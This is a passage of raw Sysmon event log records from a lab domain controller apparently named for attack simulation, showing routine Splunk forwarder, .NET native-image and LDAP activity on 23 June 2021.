Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1B9-60D3-7003-00000000CF01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.972{4DB9351A-A1B9-60D3-7003-00000000CF01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000020361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.538{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AAD46F4AB092C262B72CE6B37D349A65,SHA256=21795E17BFE8B5556DE6914314DEF18B71CB15A6196FE2CCA5E5074AEDC6D844,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.487{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B9-60D3-6F03-00000000CF01}4376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.471{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B9-60D3-6F03-00000000CF01}4376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.471{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B9-60D3-6F03-00000000CF01}4376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.362{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B9-60D3-6E03-00000000CF01}6396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.331{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1B9-60D3-6E03-00000000CF01}6396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.331{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B9-60D3-6E03-00000000CF01}6396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:53.159{4DB9351A-A1B7-60D3-6C03-00000000CF01}2928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b70-0\Microsoft.GroupPolicy.Reporting.dll2021-06-23 21:03:53.159 10341000x800000000000000020353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.096{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1B9-60D3-6D03-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.081{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.081{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.081{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.081{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.081{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1B9-60D3-6D03-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.081{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1B9-60D3-6D03-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.081{4DB9351A-A1B9-60D3-6D03-00000000CF01}5584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000020396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.991{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0FEA12BA39AB3554EAEE86E0D73D381,SHA256=5C0042799660EBBD1A887C1745C9EDE4B53882E41E6FE2932607BB7390701175,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.726{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1BA-60D3-7503-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.726{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BA-60D3-7503-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.726{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.726{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.726{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.726{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.726{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1BA-60D3-7503-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:54.726{4DB9351A-A1BA-60D3-7503-00000000CF01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000020387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:52.573{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61419-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000020386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:52.572{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61419-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 10341000x800000000000000020385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 